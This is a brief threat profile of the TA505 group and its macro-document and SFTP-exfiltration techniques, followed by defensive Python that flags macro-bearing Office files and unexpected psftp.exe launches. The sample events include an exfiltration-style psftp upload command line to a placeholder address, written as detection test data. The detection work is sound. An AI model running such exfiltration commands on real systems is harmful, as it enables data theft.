Eager Beaver TA505
The TA505 threat group has been in operation since at least 2014 and continues to release new campaigns aimed at entities in multiple countries, including Canada, Germany, South Korea, the UK, and the United States. Custom malware is used during the attacks, including the Get2 downloader and the SDBBot remote access trojan. The actor is also known to use a PuTTY SFTP client to exfiltrate sensitive information from infected networks. The initial vector consists of malicious documents that appear legitimate and require the victim to enable macros to start the infection chain.
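The two observable points in the chain above, a macro-bearing Office document at delivery time and a PuTTY SFTP client (`psftp.exe`) launched on a workstation during exfiltration, can both be checked with a few lines of defender-side code. The example below is added here and is not code from the page or from any vendor report; the document archive and the process-creation events are constructed inline, and the image paths, hostnames and the RFC 5737 address are assumptions made for the sample.

```python
import io
import ntpath
import zipfile

# --- Delivery stage: does an OOXML document carry a VBA project? ---

def build_sample_docx(with_macro: bool) -> bytes:
    """Constructed minimal OOXML-style archive used only as test input.
    A real macro-enabled document stores its VBA in word/vbaProject.bin
    (xl/vbaProject.bin for Excel); the bytes here are a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00placeholder")
    return buf.getvalue()


def has_vba_project(doc_bytes: bytes) -> bool:
    """True when any member of the OOXML zip is a vbaProject.bin.
    Non-zip input (legacy .doc, corrupt file) returns False rather than raising,
    so it needs a separate check; this function only covers OOXML."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


# --- Exfiltration stage: PuTTY SFTP client starting on a workstation ---

# Constructed process-creation events (hypothetical hosts, paths and address).
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": "cmd.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\psftp.exe",
     "cmdline": "psftp.exe backup@203.0.113.10 -b upload.txt"},
    {"host": "ws-02", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"host": "srv-07", "parent": "services.exe",
     "image": r"C:\Program Files\PuTTY\psftp.exe",
     "cmdline": "psftp.exe -b nightly.txt backup@203.0.113.20"},
]

# Assumption for the sample: srv-07 is an approved backup server where psftp is expected.
APPROVED_SFTP_HOSTS = {"srv-07"}


def flag_sftp_exfil(events):
    """Return events where the PuTTY SFTP client starts on a host not
    approved for it. Matching on the image basename keeps a renamed
    directory (e.g. a Temp folder) from evading the check."""
    hits = []
    for ev in events:
        image = ntpath.basename(ev["image"]).lower()
        if image == "psftp.exe" and ev["host"] not in APPROVED_SFTP_HOSTS:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    print("macro doc flagged:", has_vba_project(build_sample_docx(True)))
    print("plain doc flagged:", has_vba_project(build_sample_docx(False)))
    for hit in flag_sftp_exfil(SAMPLE_EVENTS):
        print("psftp on", hit["host"], "->", hit["cmdline"])
```

The document check is a triage filter, not a verdict: a legitimate document can carry macros, so the hit should route the file to sandboxing or macro-content review. The process check is deliberately narrow (image name plus an allow-list of hosts) so it produces few false positives; a copy of `psftp.exe` renamed to something else would need a hash- or signer-based rule instead.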